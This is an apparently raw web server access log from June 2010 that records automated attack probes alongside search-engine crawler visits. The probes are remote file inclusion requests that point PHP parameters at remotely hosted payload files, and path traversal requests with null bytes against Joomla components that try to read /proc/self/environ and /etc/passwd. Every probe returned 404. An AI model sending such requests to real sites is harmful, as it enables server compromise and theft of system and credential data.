211.203.180.144 - - [10/Jun/2010:02:16:40 -0500] "GET /logs/config.php?path_to_root=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
211.203.180.144 - - [10/Jun/2010:02:16:40 -0500] "GET /logs/access_log.1274227200/config.php?path_to_root=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
94.136.63.119 - - [10/Jun/2010:02:17:20 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.136.63.119 - - [10/Jun/2010:02:17:22 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
67.195.112.180 - - [10/Jun/2010:02:17:32 -0500] "GET /logs/access_log.1172707200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
202.63.240.21 - - [10/Jun/2010:02:17:35 -0500] "GET /logs/config.php?path_to_root=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
202.63.240.21 - - [10/Jun/2010:02:17:35 -0500] "GET /config.php?path_to_root=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
202.63.240.21 - - [10/Jun/2010:02:17:35 -0500] "GET /logs/access_log.1274227200/config.php?path_to_root=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
67.227.143.132 - - [10/Jun/2010:02:17:46 -0500] "GET /logs/access_log.1274832000//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
67.227.143.132 - - [10/Jun/2010:02:17:47 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
67.227.143.132 - - [10/Jun/2010:02:17:47 -0500] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
69.16.227.125 - - [10/Jun/2010:02:19:55 -0500] "GET /logs/access_log.1274832000//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
69.16.227.125 - - [10/Jun/2010:02:19:55 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
69.16.227.125 - - [10/Jun/2010:02:19:55 -0500] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
72.32.58.140 - - [10/Jun/2010:02:20:40 -0500] "GET /logs/access_log.1274832000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
72.32.58.140 - - [10/Jun/2010:02:20:40 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
72.32.58.140 - - [10/Jun/2010:02:20:40 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
212.91.137.94 - - [10/Jun/2010:02:21:39 -0500] "GET /modules/My_eGallery/index.php?basepath=http://sistar.fileave.com/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
212.91.137.94 - - [10/Jun/2010:02:21:40 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://sistar.fileave.com/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
212.91.137.94 - - [10/Jun/2010:02:21:41 -0500] "GET /logs/access_log.1271548800/modules/My_eGallery/index.php?basepath=http://sistar.fileave.com/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
212.91.137.94 - - [10/Jun/2010:02:22:06 -0500] "GET /modules/My_eGallery/index.php?basepath=http://sistar.fileave.com/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
212.91.137.94 - - [10/Jun/2010:02:22:07 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://sistar.fileave.com/id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
212.91.137.94 - - [10/Jun/2010:02:22:07 -0500] "GET /logs/access_log.1271548800/modules/My_eGallery/index.php?basepath=http://sistar.fileave.com/id1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
212.91.137.94 - - [10/Jun/2010:02:22:08 -0500] "GET //includes/db_adodb.php?baseDir=http://sistar.fileave.com/id1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
212.91.137.94 - - [10/Jun/2010:02:22:09 -0500] "GET /logs//includes/db_adodb.php?baseDir=http://sistar.fileave.com/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
212.91.137.94 - - [10/Jun/2010:02:22:10 -0500] "GET /logs/access_log.1273017600%20%20//includes/db_adodb.php?baseDir=http://sistar.fileave.com/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
212.91.137.94 - - [10/Jun/2010:02:22:56 -0500] "GET //includes/db_adodb.php?baseDir=http://sistar.fileave.com/id1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
212.91.137.94 - - [10/Jun/2010:02:22:57 -0500] "GET /logs//includes/db_adodb.php?baseDir=http://sistar.fileave.com/id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
212.91.137.94 - - [10/Jun/2010:02:22:57 -0500] "GET /logs/access_log.1273017600%20%20//includes/db_adodb.php?baseDir=http://sistar.fileave.com/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
94.136.63.119 - - [10/Jun/2010:02:23:16 -0500] "GET /logs/access_log.1274832000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
94.136.63.119 - - [10/Jun/2010:02:23:17 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.136.63.119 - - [10/Jun/2010:02:23:17 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
67.195.112.180 - - [10/Jun/2010:02:23:18 -0500] "GET /logs/access_log.1211500800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
94.136.63.119 - - [10/Jun/2010:02:23:21 -0500] "GET /logs/access_log.1274832000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
94.136.63.119 - - [10/Jun/2010:02:23:21 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.136.63.119 - - [10/Jun/2010:02:23:21 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.136.63.119 - - [10/Jun/2010:02:26:17 -0500] "GET /logs/access_log.1274572800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
94.136.63.119 - - [10/Jun/2010:02:26:25 -0500] "GET /logs/access_log.1274572800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
211.203.180.144 - - [10/Jun/2010:02:31:28 -0500] "GET //main.php?sayfa=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
211.203.180.144 - - [10/Jun/2010:02:31:28 -0500] "GET /logs//main.php?sayfa=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
211.203.180.144 - - [10/Jun/2010:02:31:29 -0500] "GET /logs/access_log.1274572800%20%20//main.php?sayfa=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
211.203.180.144 - - [10/Jun/2010:02:31:43 -0500] "GET //main.php?sayfa=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
211.203.180.144 - - [10/Jun/2010:02:31:43 -0500] "GET /logs/access_log.1271548800//main.php?sayfa=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.203.180.144 - - [10/Jun/2010:02:31:43 -0500] "GET /logs//main.php?sayfa=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
217.160.249.213 - - [10/Jun/2010:02:32:13 -0500] "GET /logs/inurl:%22com_videodb%22 HTTP/1.1" 404 308 "-""libwww-perl/5.805"
217.160.249.213 - - [10/Jun/2010:02:32:13 -0500] "GET /inurl:%22com_videodb%22 HTTP/1.1" 404 303 "-""libwww-perl/5.805"
202.63.240.21 - - [10/Jun/2010:02:32:49 -0500] "GET /logs/access_log.1274572800%20%20//main.php?sayfa=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
202.63.240.21 - - [10/Jun/2010:02:32:49 -0500] "GET //main.php?sayfa=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
202.63.240.21 - - [10/Jun/2010:02:32:49 -0500] "GET /logs//main.php?sayfa=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
202.63.240.21 - - [10/Jun/2010:02:33:06 -0500] "GET /logs/access_log.1271548800//main.php?sayfa=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
202.63.240.21 - - [10/Jun/2010:02:33:06 -0500] "GET //main.php?sayfa=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
202.63.240.21 - - [10/Jun/2010:02:33:06 -0500] "GET /logs//main.php?sayfa=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
207.46.204.182 - - [10/Jun/2010:02:36:08 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.182 - - [10/Jun/2010:02:36:08 -0500] "GET /logs/access_log.1206057600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.55.65.134 - - [10/Jun/2010:02:38:04 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
207.46.204.241 - - [10/Jun/2010:02:38:09 -0500] "GET /logs/access_log.1219363200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.55.65.134 - - [10/Jun/2010:02:39:50 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
217.73.239.8 - - [10/Jun/2010:02:39:51 -0500] "GET /logs//*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.807"
217.73.239.8 - - [10/Jun/2010:02:39:51 -0500] "GET //*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.807"
74.55.65.134 - - [10/Jun/2010:02:40:24 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
91.203.68.45 - - [10/Jun/2010:02:44:25 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
91.203.68.45 - - [10/Jun/2010:02:44:26 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
91.203.68.45 - - [10/Jun/2010:02:44:32 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
91.203.68.45 - - [10/Jun/2010:02:44:33 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
91.203.68.45 - - [10/Jun/2010:02:44:47 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
91.203.68.45 - - [10/Jun/2010:02:44:48 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
89.200.169.108 - - [10/Jun/2010:02:44:48 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:02:44:49 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:02:44:51 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:02:44:51 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:02:45:00 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:02:45:01 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:02:45:05 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:02:45:06 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:02:45:07 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:02:45:07 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:02:45:09 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:02:45:09 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
217.73.239.8 - - [10/Jun/2010:02:46:10 -0500] "GET /logs//*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.807"
217.73.239.8 - - [10/Jun/2010:02:46:11 -0500] "GET //*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.807"
74.55.65.134 - - [10/Jun/2010:02:49:11 -0500] "GET /logs/access_log.1273017600///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.831"
74.55.65.134 - - [10/Jun/2010:02:49:11 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
74.55.65.134 - - [10/Jun/2010:02:49:11 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.831"
79.170.45.162 - - [10/Jun/2010:02:49:18 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:02:49:22 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:02:49:52 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:02:49:53 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:02:49:55 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
79.170.45.162 - - [10/Jun/2010:02:49:56 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
217.73.239.8 - - [10/Jun/2010:02:50:49 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.807"
217.73.239.8 - - [10/Jun/2010:02:50:50 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.807"
119.63.198.9 - - [10/Jun/2010:02:52:16 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
188.40.178.145 - - [10/Jun/2010:02:53:00 -0500] "GET /logs//index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
188.40.178.145 - - [10/Jun/2010:02:53:00 -0500] "GET //index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
188.40.178.145 - - [10/Jun/2010:02:53:02 -0500] "GET /logs//index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
188.40.178.145 - - [10/Jun/2010:02:53:02 -0500] "GET //index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
91.203.68.45 - - [10/Jun/2010:02:53:41 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
91.203.68.45 - - [10/Jun/2010:02:53:41 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
91.203.68.45 - - [10/Jun/2010:02:53:42 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
91.203.68.45 - - [10/Jun/2010:02:53:42 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
74.55.65.134 - - [10/Jun/2010:02:53:44 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
74.55.65.134 - - [10/Jun/2010:02:53:44 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
74.55.65.134 - - [10/Jun/2010:02:53:44 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
91.203.68.45 - - [10/Jun/2010:02:53:46 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
91.203.68.45 - - [10/Jun/2010:02:53:46 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
74.55.65.134 - - [10/Jun/2010:02:53:47 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
74.55.65.134 - - [10/Jun/2010:02:53:47 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
74.55.65.134 - - [10/Jun/2010:02:53:47 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
89.200.169.108 - - [10/Jun/2010:02:53:56 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:02:53:56 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:02:54:07 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:02:54:07 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:02:54:09 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:02:54:09 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
91.203.68.45 - - [10/Jun/2010:02:54:12 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
91.203.68.45 - - [10/Jun/2010:02:54:12 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
89.200.169.108 - - [10/Jun/2010:02:54:24 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.169.108 - - [10/Jun/2010:02:54:24 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
